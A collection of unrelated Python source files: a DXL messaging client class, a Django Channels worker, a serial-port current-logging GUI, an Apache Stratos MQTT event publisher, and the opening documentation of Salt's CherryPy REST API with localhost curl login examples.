:param topic: The topic to receive :class:`dxlclient.message.Request` messages on. A topic of ``None`` indicates
that the callback should receive :class:`dxlclient.message.Request` messages for all topics (no filtering).
:param request_callback: The :class:`dxlclient.callbacks.RequestCallback` to be invoked when a
:class:`dxlclient.message.Request` message is received on the specified topic
"""
self._response_callbacks.add_callback(("" if topic is None else topic), response_callback)
def remove_response_callback(self, topic, response_callback):
"""
Removes a :class:`dxlclient.callbacks.ResponseCallback` from the client for the specified topic. This method
must be invoked with the same arguments as when the callback was originally registered via
:func:`add_response_callback`.
:param topic: The topic to remove the callback for
:param response_callback: The :class:`dxlclient.callbacks.ResponseCallback` to be removed for the specified topic
"""
self._response_callbacks.remove_callback(("" if topic is None else topic), response_callback)
def add_event_callback(self, topic, event_callback, subscribe_to_topic=True):
"""
Adds a :class:`dxlclient.callbacks.EventCallback` to the client for the specified topic.
The callback will be invoked when :class:`dxlclient.message.Event` messages are received by the client
on the specified topic. A topic of ``None`` indicates that the callback should receive
:class:`dxlclient.message.Event` messages for all topics (no filtering).
:param topic: The topic to receive :class:`dxlclient.message.Event` messages on. A topic of ``None`` indicates
that the callback should receive :class:`dxlclient.message.Event` messages for all topics (no filtering).
:param event_callback: The :class:`dxlclient.callbacks.EventCallback` to be invoked when a
:class:`dxlclient.message.Event` message is received on the specified topic
:param subscribe_to_topic: Optional parameter to indicate if the client should subscribe
(:func:`dxlclient.client.DxlClient.subscribe`) to the topic.
By default the client will subscribe to the topic. Specify ``False`` to prevent subscribing to the topic.
"""
self._event_callbacks.add_callback(("" if topic is None else topic), event_callback)
if subscribe_to_topic is True and topic is not None:
self.subscribe(topic)
def remove_event_callback(self, topic, event_callback, unsubscribe_from_topic=True):
"""
Removes a :class:`dxlclient.callbacks.EventCallback` from the client for the specified topic. This method
must be invoked with the same arguments as when the callback was originally registered via
:func:`add_event_callback`.
:param topic: The topic to remove the callback for
:param event_callback: The :class:`dxlclient.callbacks.EventCallback` to be removed for the specified topic
:param unsubscribe_from_topic: Optional parameter to indicate if the client should also unsubscribe
(:func:`dxlclient.client.DxlClient.unsubscribe`) from the topic. By default the client will unsubscribe
from the topic. Specify ``False`` to prevent unsubscribing to the topic.
"""
self._event_callbacks.remove_callback(("" if topic is None else topic), event_callback)
if unsubscribe_from_topic is True and topic is not None:
self.unsubscribe(topic)
def _fire_request(self, request):
"""
Fires the specified {@link Request} to {@link RequestCallback} listeners currently
registered with the client.
:param request: The {@link Request} to fire
"""
self._request_callbacks.fire_message(request)
def _fire_response(self, response):
"""
Fires the specified {@link Response} to {@link ResponseCallback} listeners currently
registered with the client.
:param response: The {@link Response} to fire
"""
self._response_callbacks.fire_message(response)
def _fire_event(self, event):
"""
Fires the specified {@link Event} to {@link EventCallback} listeners currently
registered with the client.
:param event: The {@link Event} to fire
"""
self._event_callbacks.fire_message(event)
def _handle_message(self, channel, payload):
"""
Processes an incoming message. The bytes from the message are converted into the appropriate
message type instance (request, response, event, etc.) and then the corresponding registered
message callbacks are notified.
:param channel: The channel that the message arrived on
:param payload: The message received from the channel (as bytes)
"""
message = Message._from_bytes(payload)
message.destination_topic = channel
if isinstance(message, Event):
self._fire_event(message)
elif isinstance(message, Request):
self._fire_request(message)
elif isinstance(message, Response) or isinstance(message, ErrorResponse):
self._fire_response(message)
else:
raise ValueError("Unknown message type")
def register_service_async(self, service_reg_info):
"""
Registers a DXL service with the fabric asynchronously. The specified
:class:`dxlclient.service.ServiceRegistrationInfo` instance contains information about the
service that is to be registered.
This method differs from :func:`register_service_sync` due to the fact that it returns to the caller
immediately after sending the registration message to the DXL fabric (It does
not wait for registration confirmation before returning).
See :mod:`dxlclient.service` for more information on DXL services.
:param service_reg_info: A :class:`dxlclient.service.ServiceRegistrationInfo` instance containing information
about the service that is to be registered.
"""
if self._service_manager: self._service_manager.add_service(service_reg_info)
def unregister_service_async(self, service_reg_info):
"""
Unregisters (removes) a DXL service with from the fabric asynchronously. The specified
:class:`dxlclient.service.ServiceRegistrationInfo` instance contains information about the
service that is to be removed.
This method differs from :func:`unregister_service_sync` due to the fact that it returns to the caller
immediately after sending the unregistration message to the DXL fabric (It does
not wait for unregistration confirmation before returning).
See :mod:`dxlclient.service` for more information on DXL services.
:param service_reg_info: A :class:`dxlclient.service.ServiceRegistrationInfo` instance containing information
about the service that is to be unregistered.
"""
if self._service_manager: self._service_manager.remove_service(service_reg_info.service_id)
def register_service_sync(self, service_req_info, timeout):
"""
Registers a DXL service with the fabric. The specified
:class:`dxlclient.service.ServiceRegistrationInfo` instance contains information about the
service that is to be registered.
This method will wait for confirmation of the service registration for up to the specified timeout
in seconds. If the timeout is exceeded an exception will be raised.
See :mod:`dxlclient.service` for more information on DXL services.
:param service_reg_info: A :class:`dxlclient.service.ServiceRegistrationInfo` instance containing information
about the service that is to be registered.
:param timeout: The amount of time (in seconds) to wait for confirmation of the service registration.
If the timeout is exceeded an exception will be raised.
"""
if self._service_manager:
if not self.connected:
raise DxlException("Client is not currently connected")
self._service_manager.add_service(service_req_info)
service_req_info._wait_for_registration(timeout=timeout)
def unregister_service_sync(self, service_req_info, timeout):
"""
Unregisters (removes) a DXL service from the fabric. The specified
:class:`dxlclient.service.ServiceRegistrationInfo` instance contains information about the
service that is to be removed.
This method will wait for confirmation of the service unregistration for up to the specified timeout
in seconds. If the timeout is exceeded an exception will be raised.
See :mod:`dxlclient.service` for more information on DXL services.
:param service_reg_info: A :class:`dxlclient.service.ServiceRegistrationInfo` instance containing information
about the service that is to be removed.
:param timeout: The amount of time (in seconds) to wait for confirmation of the service unregistration.
If the timeout is exceeded an exception will be raised.
"""
if self._service_manager:
if not self.connected:
raise DxlException("Client is not currently connected")
if not service_req_info:
raise ValueError("Undefined service object")
self._service_manager.remove_service(service_req_info.service_id)
service_req_info._wait_for_unregistration(timeout=timeout)
|
worker.py
|
from __future__ import unicode_literals
import fnmatch
import logging
import multiprocessing
import signal
import sys
import threading
import time
from .exceptions import ChannelSocketException, ConsumeLater, DenyConnection
from .message import Message
from .signals import consumer_finished, consumer_started, worker_ready
from .utils import name_that_thing
logger = logging.getLogger('django.channels')
class Worker(object):
"""
A "worker" process that continually looks for available messages to run
and runs their consumers.
"""
def __init__(
self,
channel_layer,
callback=None,
message_retries=10,
signal_handlers=True,
only_channels=None,
exclude_channels=None
):
self.channel_layer = channel_layer
self.callback = callback
self.message_retries = message_retries
self.signal_handlers = signal_handlers
self.only_channels = only_channels
self.exclude_channels = exclude_channels
self.termed = False
self.in_job = False
def install_signal_handler(self):
signal.signal(signal.SIGTERM, self.sigterm_handler)
signal.signal(signal.SIGINT, self.sigterm_handler)
def sigterm_handler(self, signo, stack_frame):
self.termed = True
if self.in_job:
logger.info("Shutdown signal received while busy, waiting for loop termination")
else:
logger.info("Shutdown signal received while idle, terminating immediately")
sys.exit(0)
def apply_channel_filters(self, channels):
"""
Applies our include and exclude filters to the channel list and returns it
"""
if self.only_channels:
channels = [
channel for channel in channels
if any(fnmatch.fnmatchcase(channel, pattern) for pattern in self.only_channels)
]
if self.exclude_channels:
channels = [
channel for channel in channels
if not any(fnmatch.fnmatchcase(channel, pattern) for pattern in self.exclude_channels)
]
return channels
def ready(self):
"""
Called once worker setup is complete.
"""
worker_ready.send(sender=self)
def run(self):
"""
Tries to continually dispatch messages to consumers.
"""
if self.signal_handlers:
self.install_signal_handler()
channels = self.apply_channel_filters(self.channel_layer.router.channels)
logger.info("Listening on channels %s", ", ".join(sorted(channels)))
while not self.termed:
self.in_job = False
channel, content = self.channel_layer.receive_many(channels, block=True)
self.in_job = True
# If no message, stall a little to avoid busy-looping then continue
if channel is None:
time.sleep(0.01)
continue
# Create message wrapper
logger.debug("Got message on %s (reply %s)", channel, content.get("reply_channel", "none"))
message = Message(
content=content,
channel_name=channel,
channel_layer=self.channel_layer,
)
# Add attribute to message if it's been retried almost too many times,
# and would be thrown away this time if it's requeued. Used for helpful
# warnings in decorators and such - don't rely on this as public API.
if content.get("__retries__", 0) == self.message_retries:
message.__doomed__ = True
# Handle the message
match = self.channel_layer.router.match(message)
if match is None:
logger.error("Could not find match for message on %s! Check your routing.", channel)
continue
else:
consumer, kwargs = match
if self.callback:
self.callback(channel, message)
try:
logger.debug("Dispatching message on %s to %s", channel, name_that_thing(consumer))
# Send consumer started to manage lifecycle stuff
consumer_started.send(sender=self.__class__, environ={})
# Run consumer
consumer(message, **kwargs)
except DenyConnection:
# They want to deny a WebSocket connection.
if message.channel.name != "websocket.connect":
raise ValueError("You cannot DenyConnection from a non-websocket.connect handler.")
message.reply_channel.send({"close": True})
except ChannelSocketException as e:
e.run(message)
except ConsumeLater:
# They want to not handle it yet. Re-inject it with a number-of-tries marker.
content['__retries__'] = content.get("__retries__", 0) + 1
# If we retried too many times, quit and error rather than
# spinning forever
if content['__retries__'] > self.message_retries:
logger.warning(
"Exceeded number of retries for message on channel %s: %s",
channel,
repr(content)[:100],
)
continue
# Try to re-insert it a few times then drop it
for _ in range(10):
try:
self.channel_layer.send(channel, content)
except self.channel_layer.ChannelFull:
time.sleep(0.05)
else:
break
except:
logger.exception("Error processing message with consumer %s:", name_that_thing(consumer))
finally:
# Send consumer finished so DB conns close etc.
consumer_finished.send(sender=self.__class__)
class WorkerGroup(Worker):
"""
Group several workers together in threads. Manages the sub-workers,
terminating them if a signal is received.
"""
def __init__(self, *args, **kwargs):
n_threads = kwargs.pop('n_threads', multiprocessing.cpu_count()) - 1
super(WorkerGroup, self).__init__(*args, **kwargs)
kwargs['signal_handlers'] = False
self.workers = [Worker(*args, **kwargs) for ii in range(n_threads)]
def sigterm_handler(self, signo, stack_frame):
self.termed = True
for wkr in self.workers:
wkr.termed = True
logger.info("Shutdown signal received while busy, waiting for "
"loop termination")
def ready(self):
super(WorkerGroup, self).ready()
for wkr in self.workers:
wkr.ready()
def run(self):
"""
Launch sub-workers before running.
"""
self.threads = [threading.Thread(target=self.workers[ii].run)
for ii in range(len(self.workers))]
for t in self.threads:
t.start()
super(WorkerGroup, self).run()
# Join threads once completed.
for t in self.threads:
t.join()
|
code.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 1/8/2020 3:41 PM
# @Author : yonnsongLee@163.com
# @Site :
# @File : app.py
# @Software: PyCharm
import array
import sys
import time
import serial
import serial.tools.list_ports
import threading
import pyqtgraph as pg
from tkinter import *
from openpyxl import *
serialPortList = []
for item in serial.tools.list_ports.comports():
serialPortList.append(str(item)[0:str(item).find("-")-1])
def controlPanel():
global buttonList, btnStart, btnPause, btnStop, allSampleNumberEntry, rangeFromEntry, rangeToEntry, resultAverageCurrentEntry
root = Tk()
root.title(" CONTROL PANEL")
# root.iconbitmap('m.ico')
ws = root.winfo_screenwidth()
hs = root.winfo_screenheight()
x = (ws / 2) - (800 / 2)
y = (hs / 2) - (500 / 2)
root.geometry('%dx%d+%d+%d' % (800, 500, x, y))
labelTop = Label(root,text="1. Select the serial port",font=("Calibri",13))
labelTop.place(x = 20,y = 10,anchor = NW)
buttonList = StringVar()
for index,port in enumerate(serialPortList):
r = Radiobutton(root, variable=buttonList, value=port, text=port, bd=10, font=("Calibri",10))
r.place(x=100*index+50, y=50)
buttonList.set(serialPortList[0])
if(len(serialPortList) > 0):
labelButton = Label(root, text="2. Start acquisition",font=("Calibri",13))
labelButton.place(x = 20,y = 100,anchor = NW)
btnStart = Button(root, text=" START", bg="SeaGreen", fg="white",width=10, command=startAcquisition)
btnPause = Button(root, text=" PAUSE", bg="Olive", fg="white", width=10, command=pauseAcquisition)
btnStop = Button(root, text=" STOP ", bg="red", fg="white", width=10, command=stopAcquisition)
btnStart.place(x=60, y=150)
labelSampleNumberTitle = Label(root, text="3. Get the number of samples",font=("Calibri",13))
labelSampleNumberTitle.place(x = 20, y = 200, anchor = NW)
allSampleNumberLabel = Label(root,text="Sample Num:",font=("Calibri",10))
allSampleNumberEntry = Entry(root,width=10,justify=CENTER)
btnGetSampleNumber = Button(root, text="Get", bg="OrangeRed", fg="white", width=6,command=getSampleNumber)
allSampleNumberLabel.place(x = 60, y = 250)
allSampleNumberEntry.place(x = 175,y = 250)
btnGetSampleNumber.place(x = 290, y = 245)
labelAverageCurrentTitle = Label(root, text="4. Calculate the average current, view waveform and input the range to calculate",font=("Calibri",13))
labelAverageCurrentTitle.place(x = 20, y = 300, anchor = NW)
rangeFromLabel = Label(root,text="From",font=("Calibri",10))
rangeFromEntry = Entry(root,width=10,justify=CENTER)
rangeToLabel = Label(root,text="To",font=("Calibri",10))
rangeToEntry = Entry(root,width=10,justify=CENTER)
resultAverageCurrentLabel = Label(root,text="Average Value is :",font=("Calibri",10))
resultAverageCurrentEntry = Entry(root,width=19,bd=3,fg="MediumBlue",justify=CENTER)
btnAverageCurrent = Button(root, text="Average Value", bg="orange", fg="white",width=15, command=calculateAverageCurrent)
rangeFromLabel.place(x = 60,y = 350)
rangeFromEntry.place(x = 110,y = 350)
rangeToLabel.place(x = 230,y = 350)
rangeToEntry.place(x = 280,y = 350)
# resultAverageCurrentLabel.place(x = 400, y = 350)
resultAverageCurrentEntry.place(x = 570, y = 350)
btnAverageCurrent.place(x = 400, y = 346)
labelAverageCurrentTitle = Label(root,text="5. Save data to Excel file",font=("Calibri", 13))
labelAverageCurrentTitle.place(x=20, y=410, anchor=NW)
btnIntoExcel = Button(root, text="To Excel", bg="Tomato", fg="white",width=15, command=saveDataIntoExcel)
btnIntoExcel.place(x = 300, y = 410)
else:
labelWarningNoSerialPortConnection = Label(root, text=" No serial port available, please connect.. ",fg="red",font=("Calibri", 20))
labelWarningNoSerialPortConnection.place(x=100, y=300)
root.mainloop()
def startAcquisition():
global buttonList, mSerial, btnStart, btnStop,root
portx = buttonList.get()
mSerial = serial.Serial(portx, baudrate=115200, bytesize=serial.EIGHTBITS, parity=serial.PARITY_NONE,stopbits=serial.STOPBITS_ONE, timeout=None)
if (mSerial.isOpen()):
mSerial.flushInput()
btnStart.place_forget()
btnStop.place(x=300, y=150)
th1 = threading.Thread(target=Serial) # watch and read the serialPort data
th1.setDaemon(True)
th1.start()
else:
print("open failed")
mSerial.close() # close serial port
def pauseAcquisition():
global buttonList, mSerial, btnStart, btnStop, btnPause, pausing
if (mSerial.isOpen):
mSerial.close()
btnPause.place_forget()
btnStop.place_forget()
btnStart.place(x=60, y=150)
pausing = False
def stopAcquisition():
global buttonList, mSerial, btnStart, btnPause, btnStop
if(mSerial.isOpen):
mSerial.close()
btnPause.place_forget()
btnStop.place_forget()
btnStart.place(x=60, y=150)
# allData.clear()
def setRangeFrom():
print("from...")
def setRangeTo():
print("to..")
def getSampleNumber():
global allSampleNumberEntry
allSampleNumberEntry.delete(0,'end')
allSampleNumberEntry.insert(0,len(allData))
def calculateAverageCurrent():
global rangeFromEntry, rangeToEntry, resultAverageCurrentEntry
resultAverageCurrentEntry.delete(0,'end')
try:
From = int(rangeFromEntry.get())
To = int(rangeToEntry.get())
except Exception:
resultAverageCurrentEntry.insert(0, 'input should be integer')
else:
From = From -1
To = To - 1
count = 0
if(len(allData) <= 0):
resultAverageCurrentEntry.insert(0, "No sample data")
else:
if (From < 0 or To < 0 or To < From or To>=len(allData)):
resultAverageCurrentEntry.insert(0, "input valid")
else:
sampleNum = To - From + 1
while(From <= To):
count += allData[From]
From += 1
average_val = count / sampleNum
resultAverageCurrentEntry.insert(0,average_val)
def saveDataIntoExcel():
wb_name = str(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())).replace(':','_') + '.xlsx'
wb = Workbook()
ws = wb.active
ws.title = 'current_data'
ws.cell(1,1,'Current:A')
for i in range(len(allData)):
ws.cell(i+2,1,allData[i])
wb.save(wb_name)
def Serial():
global mSerial
while(True):
_data = str(mSerial.readline())
# _data = str(_data)[2:-5]
# _data1 = str(_data).replace('\\n','')
_data = _data.lstrip("b").strip("'").rstrip("\\r\\n")
# print(_data)
if(_data == ""):
continue
else:
global i,startTime
try:
_data = float(_data)
except Exception:
print("Not float data")
else:
now = pg.ptime.time()
i = i + 1
if(i> 50000 or pausing):
break
_data = float(_data)
# print(i,_data)
if i==1:
startTime = float(pg.ptime.time())
timeList.append(0)
allData.append(_data)
else:
timeList.append(float(now)-startTime)
allData.append(_data)
def plotData():
curve.setData(x=timeList,y=allData,pen="g")
# curve.setData(allData)
if __name__ == "__main__":
app = pg.mkQApp()
win = pg.GraphicsWindow()
win.setWindowTitle(u' real-time current curve..')
win.resize(1200, 550)
# p1 = win.addPlot(row=0, col=0)
# p1.showGrid(x=True, y=True, alpha=0.1)
# p.setRange(xRange=[0, 20000], padding=0)
# p1.setLabel(axis='left', text='Current/A')
# p1.setLabel(axis='bottom', text=' Number')
# p1.setTitle('real-time current')
# curve1 = p1.plot()
p = win.addPlot(row=0,col=0)
p.showGrid(x=True, y=True, alpha=0.1)
p.setLabel(axis='left', text='Current/A')
p.setLabel(axis='bottom', text=' Time(s)')
p.setRange(xRange=[0, 5], yRange=[-10,9000], padding=0)
p.setTitle('real-time current')
curve = p.plot()
allData = []
timeList = []
i = 0
pausing = False
th2 = threading.Thread(target = controlPanel) # loading the control panel board
th2.setDaemon(True)
th2.start()
# th1 = threading.Thread(target = Serial) # watch and read the serialPort data
# th1.setDaemon(True)
# th1.start()
timer = pg.QtCore.QTimer()
timer.timeout.connect(plotData)
timer.start(20)
app.exec_()
# th1.join()
|
publisher.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from threading import Thread
import paho.mqtt.publish as publish
import time
from Queue import Queue, Empty
import constants
import healthstats
from config import Config
from modules.event.instance.status.events import *
from modules.util import cartridgeagentutils
from modules.util.cartridgeagentutils import IncrementalCeilingListIterator
from modules.util.log import *
log = LogFactory().get_log(__name__)
publishers = {}
""" :type : dict[str, EventPublisher] """
def publish_instance_started_event():
if not Config.started:
log.info("Publishing instance started event...")
application_id = Config.application_id
service_name = Config.service_name
cluster_id = Config.cluster_id
member_id = Config.member_id
instance_id = Config.instance_id
cluster_instance_id = Config.cluster_instance_id
network_partition_id = Config.network_partition_id
partition_id = Config.partition_id
instance_started_event = InstanceStartedEvent(
application_id,
service_name,
cluster_id,
cluster_instance_id,
member_id,
instance_id,
network_partition_id,
partition_id)
publisher = get_publisher(constants.INSTANCE_STATUS_TOPIC + constants.INSTANCE_STARTED_EVENT)
publisher.publish(instance_started_event)
Config.started = True
else:
log.warn("Instance already started")
def publish_instance_activated_event():
if not Config.activated:
# Wait for all ports to be active
listen_address = Config.listen_address
configuration_ports = Config.ports
ports_active = cartridgeagentutils.wait_until_ports_active(
listen_address,
configuration_ports,
int(Config.port_check_timeout))
if ports_active:
log.info("Publishing instance activated event...")
service_name = Config.service_name
cluster_id = Config.cluster_id
member_id = Config.member_id
instance_id = Config.instance_id
cluster_instance_id = Config.cluster_instance_id
network_partition_id = Config.network_partition_id
partition_id = Config.partition_id
instance_activated_event = InstanceActivatedEvent(
service_name,
cluster_id,
cluster_instance_id,
member_id,
instance_id,
network_partition_id,
partition_id)
publisher = get_publisher(constants.INSTANCE_STATUS_TOPIC + constants.INSTANCE_ACTIVATED_EVENT)
publisher.publish(instance_activated_event)
log.info("Starting health statistics notifier")
health_stat_publishing_enabled = Config.read_property(constants.CEP_PUBLISHER_ENABLED, True)
if health_stat_publishing_enabled:
interval_default = 15 # seconds
interval = Config.read_property("stats.notifier.interval", False)
if interval is not None and len(interval) > 0:
try:
interval = int(interval)
except ValueError:
interval = interval_default
else:
interval = interval_default
health_stats_publisher = healthstats.HealthStatisticsPublisherManager(interval)
log.info("Starting Health statistics publisher with interval %r" % interval)
health_stats_publisher.start()
else:
log.warn("Statistics publisher is disabled")
Config.activated = True
log.info("Health statistics notifier started")
else:
log.error(
"Ports activation timed out. Aborting publishing instance activated event [IPAddress] %s [Ports] %s"
% (listen_address, configuration_ports))
else:
log.warn("Instance already activated")
def publish_maintenance_mode_event():
if not Config.maintenance:
log.info("Publishing instance maintenance mode event...")
service_name = Config.service_name
cluster_id = Config.cluster_id
member_id = Config.member_id
instance_id = Config.instance_id
cluster_instance_id = Config.cluster_instance_id
network_partition_id = Config.network_partition_id
partition_id = Config.partition_id
instance_maintenance_mode_event = InstanceMaintenanceModeEvent(
service_name,
cluster_id,
cluster_instance_id,
member_id,
instance_id,
network_partition_id,
partition_id)
publisher = get_publisher(constants.INSTANCE_STATUS_TOPIC + constants.INSTANCE_MAINTENANCE_MODE_EVENT)
publisher.publish(instance_maintenance_mode_event)
Config.maintenance = True
else:
log.warn("Instance already in a maintenance mode")
def publish_instance_ready_to_shutdown_event():
if not Config.ready_to_shutdown:
log.info("Publishing instance ready to shutdown event...")
service_name = Config.service_name
cluster_id = Config.cluster_id
member_id = Config.member_id
instance_id = Config.instance_id
cluster_instance_id = Config.cluster_instance_id
network_partition_id = Config.network_partition_id
partition_id = Config.partition_id
instance_shutdown_event = InstanceReadyToShutdownEvent(
service_name,
cluster_id,
cluster_instance_id,
member_id,
instance_id,
network_partition_id,
partition_id)
publisher = get_publisher(constants.INSTANCE_STATUS_TOPIC + constants.INSTANCE_READY_TO_SHUTDOWN_EVENT)
publisher.publish(instance_shutdown_event)
Config.ready_to_shutdown = True
else:
log.warn("Instance already in a ReadyToShutDown event...")
def publish_complete_topology_request_event():
complete_topology_request_event = CompleteTopologyRequestEvent()
publisher = get_publisher(constants.INITIALIZER_TOPIC + constants.COMPLETE_TOPOLOGY_REQUEST_EVENT)
publisher.publish(complete_topology_request_event)
def publish_complete_tenant_request_event():
complete_tenant_request_event = CompleteTenantRequestEvent()
publisher = get_publisher(constants.INITIALIZER_TOPIC + constants.COMPLETE_TENANT_REQUEST_EVENT)
publisher.publish(complete_tenant_request_event)
def get_publisher(topic):
if topic not in publishers:
publishers[topic] = EventPublisher(topic)
return publishers[topic]
class EventPublisher(object):
"""
Handles publishing events to topics to the provided message broker
"""
def __init__(self, topic):
self.__topic = topic
self.__log = LogFactory().get_log(__name__)
self.__start_time = int(time.time())
self.__msg_queue = Queue()
def publish(self, event):
if Config.mb_username is None:
auth = None
else:
auth = {"username": Config.mb_username, "password": Config.mb_password}
payload = event.to_json()
retry_iterator = IncrementalCeilingListIterator([2, 2, 5, 5, 10, 10, 20, 20, 30, 30, 40, 40, 50, 50, 60], False)
# Retry to publish the event until the timeout exceeds
while int(time.time()) - self.__start_time < (Config.mb_publisher_timeout * 1000):
retry_interval = retry_iterator.get_next_retry_interval()
for mb_url in Config.mb_urls.split(","):
mb_ip, mb_port = mb_url.split(":")
# start a thread to execute publish event
publisher_thread = Thread(target=self.__publish_event, args=(event, mb_ip, mb_port, auth, payload))
publisher_thread.start()
# give sometime for the thread to complete
time.sleep(5)
# check if thread is still running and notify
if publisher_thread.isAlive():
self.__log.debug(
"Event publishing timed out before succeeding. The message broker could be offline.")
# check if publish.single() succeeded
try:
published = self.__msg_queue.get(block=False)
except Empty:
published = False
if published:
return True
# All the brokers on the list were offline
self.__log.debug(
"Could not publish event to any of the provided message brokers. Retrying in %s seconds."
% retry_interval)
time.sleep(retry_interval)
# Even publisher timeout exceeded
self.__log.warn("Could not publish event to any of the provided message brokers before "
"the timeout [%s] exceeded. The event will be dropped." % Config.mb_publisher_timeout)
return False
def __publish_event(self, event, mb_ip, mb_port, auth, payload):
"""
Publishes the given event to the message broker.
When a list of message brokers are given the event is published to the first message broker
available. Therefore the message brokers should share the data (ex: Sharing the KahaDB in ActiveMQ).
When the event cannot be published, it will be retried until the mb_publisher_timeout is exceeded.
This value is set in the agent.conf.
:param event:
:return: True if the event was published.
"""
try:
self.__log.debug("Publishing [event] %s to %s:%s" % (event.__class__.__name__, mb_ip, mb_port))
publish.single(self.__topic, payload, hostname=mb_ip, port=mb_port, auth=auth)
self.__log.debug("[Event] %s published to MB: %s:%s" % (str(event.__class__.__name__), mb_ip, mb_port))
self.__msg_queue.put(True)
except Exception as err:
self.__log.debug(
"Could not publish [event] %s to message broker %s:%s. : %s"
% (str(event.__class__.__name__), mb_ip, mb_port, err))
self.__msg_queue.put(False)
|
app.py
|
# encoding: utf-8
'''
A REST API for Salt
===================
.. versionadded:: 2014.7.0
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
:depends: - CherryPy Python module (strongly recommend 3.2.x versions due to
an as yet unknown SSL error).
- salt-api package
:optdepends: - ws4py Python module for websockets support.
:configuration: All authentication is done through Salt's :ref:`external auth
<acl-eauth>` system which requires additional configuration not described
here.
Example production-ready configuration; add to the Salt master config file
and restart the ``salt-master`` and ``salt-api`` daemons:
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
Using only a secure HTTPS connection is strongly recommended since Salt
authentication credentials will be sent over the wire.
A self-signed certificate can be generated using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution function.
Running this function requires pyOpenSSL and the ``salt-call`` script is
available in the ``salt-minion`` package.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
app
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways:
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \
-H 'Accept: application/x-yaml' \
-d username=saltdev \
-d password=saltdev \
-d eauth=auto
Copy the ``token`` value from the output and include it in subsequent
requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \
-H 'Accept: application/x-yaml' \
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\
-d client=local \
-d tgt='*' \
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \
-c ~/cookies.txt \
-H 'Accept: application/x-yaml' \
-d username=saltdev \
-d password=saltdev \
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \
-b ~/cookies.txt \
-H 'Accept: application/x-yaml' \
-d client=local \
-d tgt='*' \
-d fun=test.ping
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
Commands are sent to a running Salt master via this module by sending HTTP
requests to the URLs detailed below.
.. admonition:: Content negotiation
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, x-www-form-urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
Data sent in :http:method:`post` and :http:method:`put` requests must be in
the format of a list of lowstate dictionaries. This allows multiple commands to
be executed in a single HTTP request. The order of commands in the request
corresponds to the return for each command in the response.
Lowstate, broadly, is a dictionary of values that are mapped to a function
call. This pattern is used pervasively throughout Salt. The functions called
from netapi modules are described in :ref:`Client Interfaces <netapi-clients>`.
The following example (in JSON format) causes Salt to execute two commands, a
command sent to minions as well as a runner function on the master::
[{
"client": "local",
"tgt": "*",
"fun": "test.fib",
"arg": ["10"]
},
{
"client": "runner",
"fun": "jobs.lookup_jid",
"jid": "20130603122505459265"
}]
.. admonition:: x-www-form-urlencoded
Sending JSON or YAML in the request body is simple and most flexible,
however sending data in urlencoded format is also supported with the
caveats below. It is the default format for HTML forms, many JavaScript
libraries, and the :command:`curl` command.
For example, the equivalent to running ``salt '*' test.ping`` is sending
``fun=test.ping&arg&client=local&tgt=*`` in the HTTP request body.
Caveats:
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
parameters. E.g., ``arg=one``, ``arg=two`` will be sent as ``arg[]=one``,
``arg[]=two``. This is not supported; send JSON or YAML instead.
